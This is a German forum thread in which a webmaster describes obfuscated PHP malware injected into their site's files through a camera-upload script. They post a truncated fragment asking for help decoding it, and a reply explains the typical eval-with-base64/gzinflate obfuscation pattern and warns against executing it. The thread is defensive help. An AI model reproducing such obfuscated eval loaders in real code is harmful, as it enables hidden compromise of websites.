Login

#1 (**permalink**) 08-02-2016, 14:47

Hallo,

auf meinem Webserver wurden in einem Verzeichnis alle php Dateien mit einenm Schadcode versehen.
Ich konnte dank aktuellen Backups alles wieder zurücksetzen.
Den Übeltäter habe ich auch gefunden über den das kam.
Ein kleines Script das Bilder einer Überwachungskamera auf den Server läd.

Problem ist zwar beseitigt, aber ich würde gerne wissen ob einem von euch schon mal solch ein Code bzw. dieser Code untergejubelt wurde.

Anfang und Ende des Codes, anteilig werden hier etwa nur 10% gezeigt.

PHP-Code:


			
<?php $kmodjxro = /    x24)##-!#~<#/%    x24-p%)54l}    x27;%!<*#}_;#)323ldfid>}&r%:-t%)3of:opjudovg<~    x24<!%o:!>!    x242178}527:**<(<!fwbm)%tjw)#    x24#-!#]y38#-!%w:**<")));$lpjkgoa = $yboA>2b%!<*qp%-.....................................$dbewedjq = $cghrtg("",fiddca($cadtjv,$kmodjxro,$bdnpcxffu)); $cghrtg=$kmodjxro; $dbewedjq(""); $dbewedjq=(459-338); $kmodjxro=$dbewedjq-1; ?>

Und mich würde interessieren ob es ein Tool gibt um den Code zu entschlüsseln oder von euch jemand solch einen Code entschlüsseln kann.

Für eure Tipps und Antwort sage ich schonmal danke.

#2 (**permalink**) 08-02-2016, 16:56

Glaub hellbringer, auch wenn seine Antwort knapp war. (http://phpforum.de/forum/showthread.php?t=282821)

Das Schema von so unleserlich gemachtem Code ist im Kern in der Regel:

Code:

$s = 'obfuscated string'; eval(deobfuscate($s));

Wobei deobfuscate eine oder mehrere von Funktionen wie beispielsweise base64_decode, gzinflate, Substitutionschiffre oder irgendeinem Bit-Gebastel mit XOR und Co. ist.

Auch ist der Aufruf von eval in der Regel noch verschleiert, indem der Funktionsname in einer Variablen zusammengebaut wird.

Man kann das leserlicher machen, ja. Aber es ist halt schon müßig, damit anzufangen, wenn du den Code irgendwo abschneidest und er nicht mal mehr syntaktisch korrekt ist.

Das ist prinzipiell wie bei einem Zip-Archiv oder so. Du kannst aus einem Zip-Archiv auch nicht einfach „beliebige“ Bytes ausschneiden und erwarten, dass dann ein Teil des Inhalts entpackt wird. Das mag zwar hier – je nach genutzter Methode – funktionieren, aber es ist – wie gesagt – etwas müßig, auf die Weise damit anzufangen.

Vorsicht übrigens, so einen Code einfach so auszuführen.